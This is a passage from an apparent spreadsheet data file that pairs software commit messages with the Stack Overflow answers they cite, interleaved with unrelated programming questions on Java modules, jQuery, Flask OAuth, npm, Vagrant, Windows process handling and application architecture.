          (players[x].score) = (players[x - 1].score);
          printf(&amp;quot;x = %d i = %d\n&amp;quot;, x, i);
        }
        strcpy(players[i].name, one.name);
        players[i].score = one.score;
        break;
      }
    }
  }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;output:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;x = 9 i = 8
x = 9 i = 1852797506
x = 1 i = 1852797506
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The index's seem change value without any assignment, and I feel I am missing some kind of implicit assignment, I don't know.&lt;/p&gt;
&lt;p&gt;I used gdb to debug it also, they just change after the &lt;code&gt;players[x].score = players[x -1].score&lt;/code&gt; assignment.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C656</t>
  </si>
  <si>
    <t>Fixed Module Dependencies
Excluded xml-apis in dependency xerces because it breaks the 'new' Java
Module System.
See: https://stackoverflow.com/questions/55571046/eclipse-is-confused-by-imports-accessible-from-more-than-one-module</t>
  </si>
  <si>
    <t>This is caused by: a JAR on the Classpath that contains the package java.awt that also exists in the system library but the JRE System Library is on the Modulepath
In the Java Platform Module System (JPMS) it is not allowed that the same package is made visible by more than one module. If the Modulepath and the Classpath is used, everything on the Classpath is handled as the &lt;unnamed&gt; module. In your case, the package java.awt is exported by the system module java.desktop and also exposed by the &lt;unnamed&gt; module, as it is contained in a JAR on the Classpath.
Since the JRE System Library cannot be moved from the Modulepath to the Classpath (see this answer by Stephan Herrmann for details), you have the following options:
Set the compiler compliance to 1.8 (as you already mentioned)
Rebuilt the JAR to avoid Java system library package names inside the JAR (if reflection is used, additional code changes may be necessary):
If you have the source code, change the package names (e.g. change the package and subpackae java to java_util and javax to javax_util) and recreate the JAR
If you have only the .class files you have to decompile the .class files first</t>
  </si>
  <si>
    <t xml:space="preserve">I'm thinking about developing online multiplayer social game. The shared state of the world would require something fast on the backend, so the potential solutions seem to be:
fast game engine on server (eg. c++ ) and some frontend language (php/python/ruby) + flash
whole stack in python (using twisted or stackless python) + flash
.NET (asp.net or asp.net mvc) + flash
.NET + silverlight
first one may be an overkill from productivity point of view (3 heterogenous layers)
Nr. 4 may be programmer's heaven (common environment on all layers), but:
No such thing has been ever built with Silverlight, maybe there are some showstoppers hiding around the corner
It may be hard to find silverlight designers
Despite Flash movie/clip model being criticized when compared to SL full OO architecture isn't it an advantage when it comes to designing extra parts of the virtual world by external designers? They can just prepare .swf with eg. 4 perspectives of an item on 4 frames - wouldn't it be harder with SL?
Silvelight apparently lacks in some gaming features (like collision detection)
what do you think?
[EDIT] The game itself would be part of the bigger portal - hence it would be nice to integrate the engine with some web framework.
</t>
  </si>
  <si>
    <t>C657</t>
  </si>
  <si>
    <t>Add API module dependencies to Javadoc classpath
As per http://stackoverflow.com/a/34572606/1676363</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a simple table with a checkbox in one table cell - when the user clicks the checkbox it calls a script which calls a php file to make some database updates. This is all working well.&lt;/p&gt;
&lt;p&gt;If there's an error with the php script or it returns an error I would like to restore the checkbox to its original checked state before the user clicked on it. I thought the following would do this but it's making any change:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;if (checkedState === 'true') {
  $this.attr('checked', false);
} else { 
  $this.attr('checked', true);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've attached the full script which works except for the above part where it attempts to restore the checkbox to it's original checked state.&lt;/p&gt;
&lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false" data-babel-preset-react="false" data-babel-preset-ts="false"&gt;_x000D_
&lt;div class="snippet-code"&gt;_x000D_
&lt;pre class="snippet-code-js lang-js prettyprint-override"&gt;&lt;code&gt;$(document).ready(function() {
  $("input.select-item").click(function() {
    //console.log( 'starting Checklist Item Update' );
    var recid = $(this).closest('td').attr('id');
    var checkedState = $(this).is(":checked");
    // Create a reference to $(this) here:
    $this = $(this);
    $.post('updateItem.php', {
      type: 'updateItem',
      recid: recid,
      selectionType: checkedState
    }, function(data) {
      data = JSON.parse(data);
      //console.log( data );
      if (data.error) {
        var ajaxError = (data.text);
        var errorAlert = 'There was an error updating the Completed Checklist Item - ' + ajaxError + '. Please contact the Developer';
        $this.closest('td').addClass("table-danger");
        // Restore checkbox to it's original state
        if (checkedState === 'true') {
          $this.attr('checked', false);
        } else {
          $this.attr('checked', true);
        }
        //display AJAX error details
        $("#updateSelectionsErrorMessage").html(errorAlert);
        $("#updateSelectionsError").show();
        return; // stop executing this function any further
      } else {
        $this.closest('td').addClass("table-success")
        $this.closest('td').removeClass("table-danger");
        // Restore checkbox to it's original state
        if (checkedState == true) {
          $this.attr('checked', false);
        } else {
          $this.attr('checked', true);
        }
      }
    }).fail(function(xhr) {
      var httpStatus = (xhr.status);
      var ajaxError = 'There was an error updating the Completed Checklist Item - AJAX request error. HTTP Status: ' + httpStatus + '. Please contact the Developer';
      $this.closest('td').addClass("table-danger");
      //display AJAX error details
      $("#updateSelectionsErrorMessage").html(ajaxError);
      $("#updateSelectionsError").show();
      $this.attr('checked', false); // Unchecks it
    });
  });
});&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;pre class="snippet-code-html lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;table class="table table-striped table-hover table-bordered"&amp;gt;
  &amp;lt;thead&amp;gt;
    &amp;lt;th style="width: 20%" scope="col"&amp;gt;Category&amp;lt;/th&amp;gt;
    &amp;lt;th style="width: 60%" scope="col"&amp;gt;Description&amp;lt;/th&amp;gt;
    &amp;lt;th style="width: 10%" scope="col"&amp;gt;Completed&amp;lt;/th&amp;gt;
    &amp;lt;th style="width: 10%" scope="col"&amp;gt;Check&amp;lt;/th&amp;gt;
  &amp;lt;/thead&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr id="1"&amp;gt;
      &amp;lt;td&amp;gt;Main&amp;lt;/td&amp;gt;
      &amp;lt;td&amp;gt;Lorem ipsum dolor sit amet&amp;lt;/td&amp;gt;
      &amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;
      &amp;lt;td id="1"&amp;gt;&amp;lt;input type="checkbox" class="select-item checkbox" name="select-item" value="1"&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C658</t>
  </si>
  <si>
    <t xml:space="preserve">MH-12831, Fixing dependencies
This patch is part of getting Opencast getting to not fail with Java 9+.
It fixes a lot of dependency problems I've found when making the
necessary changes for Java 9+ (e.g. explicitly adding java.ee dependencies).
Note that despite the large number of changes the only two non-test,
non-dependency fixes are two places in our code where `commons.lang` was
still used instead of `commons.lang3`.
The main parts of this patch are:
- Explicitly declaring the java.ee dependencies:
  https://stackoverflow.com/a/43574427/2352895
- Fixing obvious dependency problems which popped up due to some modules
  dependencies now being declared more precisely.
- Updating and centralizing the version of `rest-assured` which was
  partly specified incorrectly.
Note that while this patch fixes a lot of the Java 9 problems and nearly
all modules can now be built using Java 9, a few (unfortunately large)
problems still persist:
</t>
  </si>
  <si>
    <t>The JAXB APIs are considered to be Java EE APIs and therefore are no longer contained on the default classpath in Java SE 9. In Java 11, they are completely removed from the JDK.
Java 9 introduces the concepts of modules, and by default, the
java.se
aggregate module is available on the classpath (or rather, module-path). As the name implies, the
java.se
aggregate module does
not
include the Java EE APIs that have been traditionally bundled with Java 6/7/8.
Fortunately, these Java EE APIs that were provided in JDK 6/7/8 are still in the JDK, but they just aren't on the classpath by default. The extra Java EE APIs are provided in the following modules:
java.activation
java.corba
java.transaction
java.xml.bind  &lt;&lt; This one contains the JAXB APIs
java.xml.ws
java.xml.ws.annotation
Quick and dirty solution: (JDK 9/10 only)
To make the JAXB APIs available at runtime, specify the following command-line option:
--add-modules java.xml.bind
But I still need this to work with Java 8!!!
If you try specifying
--add-modules
with an older JDK, it will blow up because it's an unrecognized option. I suggest one of two options:
You can set any Java 9+ only options using the
JDK_JAVA_OPTIONS
environment variable. This environment variable is
automatically read
by the
java
launcher for Java 9+.
You can add the
-XX:+IgnoreUnrecognizedVMOptions
to make the JVM silently ignore unrecognized options, instead of blowing up. But beware! Any other command-line arguments you use will no longer be validated for you by the JVM. This option works with Oracle/OpenJDK as well as IBM JDK (as of JDK 8sr4).
Alternate quick solution: (JDK 9/10 only)
Note that you can make all of the above Java EE modules available at run time by specifying the
--add-modules java.se.ee
option. The
java.se.ee
module is an aggregate module that includes
java.se.ee
as well as the above Java EE API modules. Note, this
doesn't work on Java 11
because
java.se.ee
was removed in Java 11.
Proper long-term solution: (JDK 9 and beyond)
The Java EE API modules listed above are all marked
@Deprecated(forRemoval=true)
because they are
scheduled for removal
in
Java 11
. So the
--add-module
approach will no longer work in Java 11 out-of-the-box.
What you will need to do in Java 11 and forward is include your own copy of the Java EE APIs on the classpath or module path. For example, you can add the JAX-B APIs as a Maven dependency like this:
&lt;!-- API, java.xml.bind module --&gt;
&lt;dependency&gt;
    &lt;groupId&gt;jakarta.xml.bind&lt;/groupId&gt;
    &lt;artifactId&gt;jakarta.xml.bind-api&lt;/artifactId&gt;
    &lt;version&gt;2.3.2&lt;/version&gt;
&lt;/dependency&gt;
&lt;!-- Runtime, com.sun.xml.bind module --&gt;
&lt;dependency&gt;
    &lt;groupId&gt;org.glassfish.jaxb&lt;/groupId&gt;
    &lt;artifactId&gt;jaxb-runtime&lt;/artifactId&gt;
    &lt;version&gt;2.3.2&lt;/version&gt;
&lt;/dependency&gt;
See
Eclipse Implementation of JAXB™
and the
GitHub site
for more details on that implementation. Another implementation is
EclipseLink MOXy
.
For full details on Java modularity, see
JEP 261: Module System
As of July 2022, the latest version of the bind-api and jaxb-runtime is 4.0.0.  So you can also use
&lt;version&gt;4.0.0&lt;/version&gt;
...within those dependency clauses. But if you do so, the package names have changed from
javax.xml.bind...
to
jakarta.xml.bind...
.  You will need to modify your source code to use these later versions of the JARs.
For Gradle or Android Studio developer: (JDK 9 and beyond)
Add the following dependencies to your
build.gradle
file:
dependencies {
    // JAX-B dependencies for JDK 9+
    implementation "jakarta.xml.bind:jakarta.xml.bind-api:2.3.2"
    implementation "org.glassfish.jaxb:jaxb-runtime:2.3.2"
}</t>
  </si>
  <si>
    <t xml:space="preserve">I have worked on a Web Application based on ASP.NET Web Forms for a client of mine. This Web app is used internally and externally to manage pension plans.
My client now wants to open up access for the participants of a pension plan so that they can view how much money they will have when they retire, who are the beneficiaries, etc. Participants will have a read-only access to data.
The current Web app is buggy, hard to test and hard to change.
What are the pros and cons of creating a new app for participant access?
Is it a common practice to split public facing and internal web apps? If so why?
</t>
  </si>
  <si>
    <t>C659</t>
  </si>
  <si>
    <t xml:space="preserve">`NotificationChannelsManager` singleton module will be the manager of notification channels — modules should proxy any changes to channels through it. (There are no modules allowing to create, modify or delete notification channels at the moment, so the only thing this module does is providing a fallback notification channel — a channel `expo-notifications` creates for notifications not assigned to any other channel. It's a rather common practice — [FCM does it too](https://stackoverflow.com/a/45930522).)
</t>
  </si>
  <si>
    <t>The ID for that channel is
fcm_fallback_notification_channel
. The firebase-messaging library creates it internally.
https://github.com/firebase/firebase-android-sdk/blob/076c26db27dd54d809fb2ccff8593b64fb3db043/firebase-messaging/src/main/java/com/google/firebase/messaging/CommonNotificationBuilder.java#L66</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to Android development, now building Firefox for Android following document at &lt;a href="https://firefox-source-docs.mozilla.org/mobile/android/fenix.html" rel="nofollow noreferrer"&gt;https://firefox-source-docs.mozilla.org/mobile/android/fenix.html&lt;/a&gt;. When I install generated fenix-fenix-arm64-v8a-debug.apk and launch app, it shows spash window with Firefox icon and exits immediately. I have tried to build on Ubuntu and Windows, and tested on several android devices, all the same. Here are my build steps on Windows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;install https://ftp.mozilla.org/pub/mozilla/libraries/win32/MozillaBuildSetup-Latest.exe
run C:\mozilla-build\start-shell.bat
cd C:/
mkdir mozilla-source
cd mozilla-source
wget https://hg.mozilla.org/mozilla-central/raw-file/default/python/mozboot/bin/bootstrap.py
python3 bootstrap.py --vcs=git (choose &amp;quot;3. GeckoView/Firefox for Android Artifact Mode&amp;quot;)
add &amp;quot;ac_add_options --target=aarch64&amp;quot; to mozconfig
./mach build
./mach gradle clean fenix:assembleDebug
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and adb logcat:
&lt;a href="https://1drv.ms/u/c/01cff2ee4af3350f/ERFNM5jsp5JNjCY1DcVxujYBXCtIjignAGe2IsYrUNGYDQ?e=qWdgg6" rel="nofollow noreferrer"&gt;https://1drv.ms/u/c/01cff2ee4af3350f/ERFNM5jsp5JNjCY1DcVxujYBXCtIjignAGe2IsYrUNGYDQ?e=qWdgg6&lt;/a&gt;.
Am i missing anything?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C66</t>
  </si>
  <si>
    <t>Modified credentials
login_session[‘credentials’] = credentials changed to
login_session[‘credentials’]= credentials.access_token
It is to solve the Oauth2credentials object is not JSON serializable
and this is a security precaution.
Details see
http://stackoverflow.com/questions/22915461/google-login-server-side-flow-storing-credentials-python-examples</t>
  </si>
  <si>
    <t>Flask used to use pickle instead of JSON to store values in the session, and the Google example code was written with that in mind. Flask switched to a JSON-based format to reduce the impact of the server-side secret being disclosed (a hacker can hijack your process with pickle, not with JSON).
Store just the access token in your session:
session['credentials'] = credentials.access_token
You can recreate the credentials object with that token, using the AccessTokenCredentials class at a later time, should you need it again:
credentials = AccessTokenCredentials(session['credentials'], 'user-agent-value')
The AccessTokenCredentials object stores just the credentials; because it lacks the client id and client secret it cannot be used to refresh the token, however.
The user agent value is something you get to make up; it can help diagnose problems if you have access to the OAuth server logs; with Google I would not count on that so just make something up here.</t>
  </si>
  <si>
    <t>Modified credentials
login_session[‘credentials’] = credentials changed to
login_session[‘credentials’]= credentials.access_token
It is to solve the Oauth2credentials object is not JSON serializable
and this is a security precaution.
Details see
http://stackoverflow.com/questions/22915461/google-login-server-side-flo
w-storing-credentials-python-examples</t>
  </si>
  <si>
    <t xml:space="preserve">Using win forms with an [external-link]/[external-link] architecture, I would normally use a class to wrap a view to test the UI while using mocks for the model and controller/presenter.  The wrapper class would make most everything in the UI an observable property for the test runner through properties and events.
Would this be a viable approach to testing a WPF app?  Is there a better way? Are there any gotchas to watch out for?
</t>
  </si>
  <si>
    <t>C660</t>
  </si>
  <si>
    <t>Implement copy feature in new sentence design
Using ngclipboard: https://sachinchoolur.github.io/ngclipboard/
Had to use an undocumented AngularJS property to be able to include the module dynamically:
https://stackoverflow.com/questions/32649210/angular-dynamically-inject-module-dependency</t>
  </si>
  <si>
    <t>It can be done by using undocumented
requires
module property. This way
new dependencies can be added
to the module after it was defined but before it was bootstapped.
Since 'ng' is the only known and defined module ATM (it also has already defined
requires
array), tamper it:
angular.module('ng').requires.push('theCommentSystemModule');
Though it is more appropriate to let the users load the module by themselves.</t>
  </si>
  <si>
    <t xml:space="preserve">Whenever someone talks about a services-based architecture, they often mention scalability, often in the same breath. However, it seems that using services adds more overhead, rather than reducing it, since there is now a protocol, like SOAP or REST, involved. So, does a web services based architecture really add performance benefits as the number of users of, say, a web application, scales by perhaps an order of magnitude? Or are the scalability requirements simply offloaded onto the services, rather than the core application?
</t>
  </si>
  <si>
    <t>C661</t>
  </si>
  <si>
    <t>Improved the reliability of cache.match by using an url instead of a 
request (#28895)
* improved the reliability of cache.match by using an url instead of a request
For a tutorial, it's very important to be as safe as possible. In this case, the match would sometimes fail due to the VARY header. See more information here: https://stackoverflow.com/questions/42813582/service-worker-cache-matchrequest-returns-undefined
* Added the url to cache.match also in the complete example</t>
  </si>
  <si>
    <t>I got the exactly the same problem: gzipped, server using https, local at localhost.
TL;DR:
return cache.match(event.request, {ignoreVary: true})  // set option `ignoreVary` to `true`
Full Version:
At this page
Cache.match() - Web APIs | MDN
and I found an option
ignoreVary
:
ignoreVary: A Boolean that when set to true tells the matching operation not to perform VARY header matching — i.e. if the URL matches you will get a match regardless of the Response object having a VARY header or not. It defaults to false.
And I checked my request's response, it does have a
Vary
field with a value
Cookie, Accept-Language
. The cache wouldn't match although the value of this field does not change each time I requested.
So the solution is adding
{ignoreVary: true}
to your
cache.match()</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm getting a hydration_mismatch issue on my Svelte app even when the body and head are completely empty. I attempted to narrow down when the warning occurs but it only seems to go away when both my head and body tags are removed from page.svelte. Does anyone have any idea where the issue may be occurring?&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/x7AruaiI.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/x7AruaiI.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I put a breakpoint to pause on uncaught and caught exceptions and this is where it stops at:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/KPw34HcG.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/KPw34HcG.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;app.html:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!doctype html&amp;gt;
&amp;lt;head&amp;gt;      
    %sveltekit.head%
&amp;lt;/head&amp;gt;
&amp;lt;body data-sveltekit-preload-data=&amp;quot;hover&amp;quot;&amp;gt;
    &amp;lt;div style=&amp;quot;display: contents&amp;quot;&amp;gt;%sveltekit.body%&amp;lt;/div&amp;gt;
&amp;lt;/body&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;layout.svelte:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script&amp;gt;
   import '../app.css';
   let { children } = $props();
&amp;lt;/script&amp;gt;
{@render children()}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;page.svelte:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;head&amp;gt;&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;&amp;lt;/body&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C662</t>
  </si>
  <si>
    <t>fix: always request OAuth2 user consent to get refresh token
The authentication server only returns refresh_token if
explicit consent was given for this request. If the permission
grant was reused from previous requests, then only access_token
is given and Companion fails to re-authenticate after access_token
expiry (which is quite short).
Found at https://stackoverflow.com/a/8942732</t>
  </si>
  <si>
    <t>Found out by adding this to your url parameters
approval_prompt=force
Update:
Use
access_type=offline&amp;prompt=consent
instead.
approval_prompt=force
no longer works
https://github.com/googleapis/oauth2client/issues/453</t>
  </si>
  <si>
    <t xml:space="preserve">I read Joe Armstrong's [external-link], and the 'n times faster in n core machine' theory. The efficient way to multicore programming in Erlang is to use lots of processes (threads).
I'm a C++ programmer, so I am curious about the difference between making lots of threads in C++ and making lots of processes in Erlang. I understand dealing with threads in C/C++ is not that easy. Also I know locking/unlocking makes the system slow down. But it is not impossible, right?
So.. why is Erlang a muticore friendly language? Is it just because it's easy to program?
I'm making an online game server for a MMORPG, that's why I'm interested in Erlang as an alternative server language.
(I already read [external-link] question but I think it's not the question I'm looking for.)
</t>
  </si>
  <si>
    <t>C663</t>
  </si>
  <si>
    <t>Replace all backends by Process.spawn for portability, reliability an
d simplicity (#175)
* Try latest JRuby
* Add CI workflow
* Use Process.spawn, it is enough to implement ChildProcess
* Process.spawn requires only very minimal variants between platforms.
* Remove all other backends, Process.spawn is enough.
* Use `taskkill` to kill a process tree on Windows
* Inspired by https://stackoverflow.com/a/61113184/388803
* Using a subprocess for that is a bit heavy, OTOH we are already creating
  subprocess in ChildProcess and it only happens for a leader process on Windows.
* There seems to be no other alternative which works reliably or it would incur huge complexity.</t>
  </si>
  <si>
    <t>Pure C (if you don't count the exe call as non-C code) very quick &amp; dirty approach: use system() with taskkill.exe
/* Kill process tree in C on windows: quick and very dirty solution */
void killtree(DWORD pid, char force, char tree) {
  char cmd[1024];
  char *forceflag = force ? " /F" : "";
  char *treeflag = tree ? " /T" : "";
  sprintf(cmd, "taskkill%s%s /PID %lu", forceflag, treeflag, pid);
  system(cmd);
  /* optional additional code-- see below */
  if(process_is_running(pid)) {
    fprintf(errlog, "couldn't kill %lu\r\n", pid);
    fflush(errlog);
  }
}
/* if you want, you might also want to use process_is_running() */
static char process_is_running(DWORD pid) {
  if(!pid)
    return 0;
  HANDLE process = OpenProcess(SYNCHRONIZE, FALSE, pid);
  DWORD ret = WaitForSingleObject(process, 0);
  CloseHandle(process);
  return ret == WAIT_TIMEOUT;
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been using the below code for several months. Suddenly from 19th Feb 2025, its giving the below error.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#***********************
from yahoo_fin.stock_info import get_data
import numpy as np
mscript = 'MSFT'
st_date = &amp;quot;2025-01-01&amp;quot;
ed_date = &amp;quot;2025-01-31&amp;quot;
df = get_data(mscript, start_date=st_date, end_date=ed_date, index_as_date = True,       interval='1d')`
#**************************
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Error I get is as below&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;JSONDecodeError                           Traceback (most recent call last)
~\AppData\Roaming\Python\Python38\site-packages\requests\models.py in json(self,     **kwargs)
970         try:
--&amp;gt; 971             return complexjson.loads(self.text, **kwargs)
~\AppData\Roaming\Python\Python38\site-packages\requests\models.py in json(self, **kwargs)
 973             # Catch JSON-related errors and raise as requests.JSONDecodeError
974             # This aliases json.JSONDecodeError and simplejson.JSONDecodeError
--&amp;gt; 975             raise RequestsJSONDecodeError(e.msg, e.doc, e.pos)
976 
977     @property
JSONDecodeError: Expecting value: line 1 column 1 (char 0)`
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there something wrong that I am doing or is it a problem from Yahoo-Fin. How come the problem continues beyond 24 hrs&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C664</t>
  </si>
  <si>
    <t>Scheme script improvements
* Added comments to each major step of the scripts.
* Moved the removal of old prefPane and copying of new prefPane to the beginning of the Run Pre-action script (from Build Post-action script).
 * Deleted no-longer-used Build Post-action script.
* Before the existing osascript “tell ”s, added one to tell System Preferences to quit first, with a sleep before the next osascript tell.
 * Adjusted the sleep timings a bit for better attach-to-process reliability.
* Turned on product deployment by enabling build settings Deployment Location and Deployment PostProcessing.  
 ‣ Based on info at: https://stackoverflow.com/questions/5136172/specifying-a-build-action-e-g-install-in-xcode-gui
 * Updated scripts to copy the prefPane from the Installation Build Products Location (`DSTROOT`) combined with the Installation Directory (`INSTALL_PATH`).</t>
  </si>
  <si>
    <t>I figured that if I set both
Deployment Location
(DEPLOYMENT_LOCATION) and
Deployment Postprocessing
(DEPLOYMENT_POSTPROCESSING), then the build process installs the product and also copies public/private headers. Setting
DeploymentPostprocessing
is required no matter what the actual postprocessing is.
Also, both
Installation Directory
(INSTALL_PATH) and
Public/Private Headers Folder Path
(PUBLIC/PRIVATE_HEADERS_FOLDER_PATH) are assumed to be under
Installation Build Products Location
(DST_ROOT), so the product and headers will be located there.
One thing that bothers me is that
Installation Directory
should start with "
/
" in order to correctly appended to DST_ROOT. For example, if DST_ROOT is
/myDistributionRoot/
and INSTALL_PATH is
lib/
, then the destination directory becomes
/myDistributionRootlib
, not
/myDistributionRoot/lib
.</t>
  </si>
  <si>
    <t xml:space="preserve">A very common complexity for technical architects is to divide the application in assemblies and namespaces.
Assemblies can be partitioned according: deployment, performance and security boundaries.
Namespaces can be partitioned according logical application boundaries.
Also: namespaces can span multiple assemblies.
I had a bad experience in a project once where we partitioned assemblies according logical units of the application. This decision ended up with solution files with 30 or 40 projects! The master solution file loadtime was approx. 5 minutes!!! This ended up in a great waste of time, pff...
The opposite scenario was to hold all code in 1 assembly and partition when it is really needed.
Do you have additional tips or best-practices regarding this issue?
</t>
  </si>
  <si>
    <t>C665</t>
  </si>
  <si>
    <t>Use npm ci instead npm install (#2777)
https://stackoverflow.com/questions/45022048/why-does-npm-install-rewrite-package-lock-json
https://blog.npmjs.org/post/171556855892/introducing-npm-ci-for-faster-more-reliable
The CI command offers massive improvements to both the performance and reliability of builds for continuous integration / continuous deployment processes, providing a consistent and fast experience for developers using CI/CD in their workflow.</t>
  </si>
  <si>
    <t>Update 3: As other answers point out as well, the npm ci command got introduced in npm 5.7.0 as additional way to achieve fast and reproducible builds in the CI context. See the
documentation
and
npm blog
for further information.
Update 2:
The issue to update and clarify the documentation is
GitHub issue #18103
.
Update 1:
The behaviour that was described below got fixed in npm 5.4.2: the currently intended behaviour is outlined in
GitHub issue #17979
.
Original answer (pre-5.4.2):
The behaviour of
package-lock.json
was changed in
npm 5.1.0
as discussed in
issue #16866
. The behaviour that you observe is apparently intended by npm as of version 5.1.0.
That means that
package.json
can override
package-lock.json
whenever a newer version is found for a dependency in
package.json
. If you want to pin your dependencies effectively, you now must specify the versions without a prefix, e.g., you need to write them as
1.2.0
instead of
~1.2.0
or
^1.2.0
. Then the combination of
package.json
and
package-lock.json
will yield reproducible builds. To be clear:
package-lock.json
alone no longer locks the root level dependencies!
Whether this design decision was good or not is arguable, there is an ongoing discussion resulting from this confusion on GitHub in
issue #17979
. (In my eyes it is a questionable decision; at least the name
lock
doesn't hold true any longer.)
One more side note: there is also a restriction for registries that don’t support immutable packages, such as when you pull packages directly from GitHub instead of npmjs.org. See
this documentation of package locks
for further explanation.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="https://i.sstatic.net/Kn1aNmqG.png" rel="nofollow noreferrer"&gt;This is the goal&lt;/a&gt;
&lt;a href="https://i.sstatic.net/65722dPB.png" rel="nofollow noreferrer"&gt;This is what i made&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I can't customize properly the behaviour of the label text&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Container(
  width: 270,
  height: 40,
  decoration: BoxDecoration(
    color: const Color.fromARGB(255, 243, 250, 220),
    borderRadius: BorderRadius.circular(20),
    border: Border.all(color: Colors.green),
  ),
  child: TextFormField(
    controller: _emailController,
    textAlign: TextAlign.left,
    decoration: const InputDecoration(
      labelText: 'USERNAME OR EMAIL',
      floatingLabelBehavior: FloatingLabelBehavior.auto,
      floatingLabelAlignment:
          FloatingLabelAlignment.start,
      border: InputBorder.none,
      labelStyle: TextStyle(
          fontSize: 10,
          fontFamily: 'Montserrat',
          fontWeight: FontWeight.normal,
          letterSpacing: 0.4,
          color: const Color.fromARGB(255, 88, 88, 88)),
      contentPadding: EdgeInsets.symmetric(
          horizontal: 20, vertical: 18),
    ),
    validator: (value) {
      if (value == null || value.isEmpty) {
        return 'Please enter your email';
      }
      return null;
    },
  ),
),
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Basically, I want the label text to move to the uppermost left of the textbox when i click it, so I can type the input without the label text disappearing ang obstructing the input&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C666</t>
  </si>
  <si>
    <t>Convert QE test to Docker
Previously the QE test was running on Vagrant which can only
run on macOS runners on GitHub:
https://stackoverflow.com/questions/66261101/using-vagrant-on-github-actions-ideally-incl-virtualbox
However, there is a performance issue with the macOS runners
which is causing the test to fail occasionally:
actions/runner-images#1336
To improve the reliability, the QE test has been converted
to run on Docker instead. Some steps for configuring the
machine hostname in configure_common.yml have been removed
since it's no longer necessary.</t>
  </si>
  <si>
    <t>Yes, this is possible using the
macos-10.15
(which is
currently the
macos-latest
) environment
. You could also try to go with
macos-11.0
, but there
currently seems to be no stable VirtualBox release for Big Sur
. I created a small example project at
https://github.com/jonashackt/vagrant-github-actions
Assume you have a
Vagrantfile
inside your repo like this:
Vagrant.configure("2") do |config|
    config.vm.box = "generic/ubuntu1804"
    config.vm.define 'ubuntu'
    # Prevent SharedFoldersEnableSymlinksCreate errors
    config.vm.synced_folder ".", "/vagrant", disabled: true
end
Then you add a GitHub Action workflow like
vagrant-up.yml
inside your
.github/workflows
folder like this:
name: vagrant-up
on: [push]
jobs:
  vagrant-up:
    runs-on: macos-10.15
    steps:
    - uses: actions/checkout@v2
    - name: Cache Vagrant boxes
      uses: actions/cache@v2
      with:
        path: ~/.vagrant.d/boxes
        key: ${{ runner.os }}-vagrant-${{ hashFiles('Vagrantfile') }}
        restore-keys: |
          ${{ runner.os }}-vagrant-
    - name: Run vagrant up
      run: vagrant up
    - name: ssh into box after boot
      run: vagrant ssh -c "echo 'hello world!'"
You could even leave out
the caching action
- I simply added it here to show what's possible. It'll save you some seconds, which depends on the VagrantBox you're using.
The GitHub Actions implementation for running Vagrant is
much
easier then
the TravisCI counterpart
, because you don't need to install Vagrant or VirtualBox - and you also don't need to switch to libvirt. Just use the box you want from
https://app.vagrantup.com/boxes/search
which is pretty cool.</t>
  </si>
  <si>
    <t xml:space="preserve">Basic architecture: n physical boxes each hosting the same WCF service, sitting begind a load balancer.  Each box hitting a single database infrastructure that does not support transactions - don't ask :(
So, in the data access layer of my app I need some method of distributed transactions.  What are my options?
Note that clients to my system will be legacy apps communicating using basic web services (BasicHttpBinding) and shiny new WCF clients (NetTcpBinding or NetNamedPipeBinding ).
Edit 1
